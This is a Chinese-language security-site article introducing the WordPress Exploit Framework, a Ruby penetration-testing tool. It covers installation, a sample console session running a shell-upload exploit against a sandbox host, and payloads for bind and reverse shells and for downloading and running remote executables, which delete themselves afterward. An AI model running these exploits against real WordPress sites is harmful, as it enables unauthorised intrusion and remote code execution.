用于渗透测试WordPress的Ruby框架:WordPress Exploit Framework

2016-03-08 +6 382850人围观 ,发现 9 个不明物体 WEB安全工具

这个Ruby框架包含一些能够渗透测试WordPress网站和系统的模块,用户也可以自己开发模块扩展其功能。

运行它需要什么条件?

确保系统上安装了Ruby 2.2.x,打开一个命令行窗口,切换当前目录到WPXF文件夹下,运行命令“bundle install”,如果你的系统上没有安装bundler,可以通过执行命令“gem install bundler”安装。

如何使用它?

打开一个命令行窗口,切换当前目录到你下载保存WordPress Exploit Framework的路径,执行命令“ruby wpxf.rb”就可以启动它。

wpxf一旦加载起来,会出现一个wpxf提示符,你可以使用“search”命令来搜索模块,使用“use”命令来加载模块。

把模块加载到程序运行环境中后,可以使用“set”命令来设置选项参数,使用“info”命令查看模块相关的信息。

下面是一个例子,加载“symposium_shell_upload”漏洞利用模块,设置模块和载荷的参数,最后,执行这个漏洞利用模块攻击目标。

wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

github可以获得所有命令的列表。

辅助模块和漏洞利用模块有什么区别?

辅助模块并不能让你在目标机器上运行攻击载荷,但是能够解析目标的信息,提升权限或者提供拒绝服务的功能。

漏洞利用模块需要你指定一个攻击载荷,这将会在目标机器上执行,你可以在目标机上执行任意代码提取信息,建立一个远程shell或者其他你想在Web服务器上做的事情。

有哪些可用的载荷?

bind_php:上传一个在特定端口监听的脚本,允许WPXF建立一个远程shell;

custom:上传并执行一个定制的PHP脚本;

download_exec:下载并运行一个远程可执行文件;

exec:在远程服务器上运行一个shell命令,并把结果返回到WPXF会话;

reverse_tcp:上传一个能够建立反连TCP shell的脚本;

除了“custom”,所有这些载荷都会在执行完之后删除自己,避免在使用之后或者建立shell连接失败之后遗留在目标机器上。

如何编写自己的模块和载荷?

编写模块和载荷的方法可以在Github找到,所有的API文档都在Getwpxf

github可以下载Wordpress-Exploit-Framework

*原文地址:kitploit,felix编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)   

相关推荐

这些评论亮了

发表评论

已有 9 条评论

取消
Loading...

特别推荐

推荐关注

活动预告

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php